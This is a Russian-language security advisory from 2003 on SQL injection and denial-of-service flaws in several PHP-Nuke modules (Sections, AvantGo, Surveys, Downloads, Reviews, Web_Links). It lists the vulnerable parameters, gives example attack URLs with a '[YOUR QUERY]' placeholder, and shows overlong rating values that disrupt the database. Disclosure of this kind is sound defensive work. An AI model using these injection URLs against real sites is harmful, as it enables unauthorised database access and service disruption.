SQL инъекция в нескольких модулях в PHP-Nuke

Дата публикации:
21.05.2003
Всего просмотров:
1927
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Несколько уязвимостей обнаружено в PHP-Nuke. Удаленный пользователь может выполнить произвольные SQL команды на связанной базе данных. Удаленный пользователь может также нарушить работу базы данных.

Сообщается, что удаленный пользователь может сконструировать специально обработанный URL, чтобы выполнить произвольные SQL команды на связанной базе данных. Уязвимы следующие переменные:

'secid' в  модуле Sections 
'sid' в  модуле AvantGo 
'pollID' в  модуле Surveys 
'cid' в  модуле Downloads 
'id' в  модуле Reviews 
'cid' в  модуле Web_Links 
Пример:
http://[target]/modules.php?name=Sections&op=listarticles&secid=`[YOUR QUERY]
http://[target]/modules.php?name=Sections&op=viewarticle&artid=`[YOUR QUERY]
http://[target]/modules.php?name=Sections&op=printpage&artid==`[YOUR QUERY]
http://[target]/modules.php?name=AvantGo&file=print&sid=`[YOUR QUERY]
http://[target]/modules.php?name=Surveys&pollID=`[YOUR QUERY]
http://[target]/modules.php?name=Surveys&op=results&pollID=`[YOUR QUERY]&mode=&order=0&thold=0
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=` [YOUR QUERY]
http://[target]/modules.php?name=Downloads&d_op=viewdownload&cid=`[YOUR QUERY]&orderby=titleD
http://[target]/modules.php?name=Reviews&rop=showcontent&id=` [YOUR QUERY]
http://[target]/modules.php?name=Web_Links&l_op=viewlink&cid=`[YOUR QUERY]
http://[target]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=`[YOUR QUERY]&ratetype=num
http://[target]/modules.php?name=Downloads&ratinglid=[FILE TO RATE]& 
http://[target]/modules.php?name=Web_Links&ratinglid=96&ratinguser=?
&ratinghost_name=?&rating=99999999999999999999999 9999999999
Также сообщается, что удаленный пользователь может нарушить работу целевого сервера базы данных. Пример:
http://[target]/modules.php?name=Downloads&ratinglid=[FILE TO RATE]&ratinguser=?
&ratinghost_name=?&rating=9999999999999999999 
9999999999999999999999999999999999999999999999999999
Уязвимость обнаружена в PHP-Nuke 5.5, 6.0, 6.5

Ссылки: PHP-Nuke Denial of Service attack and more SQL Injections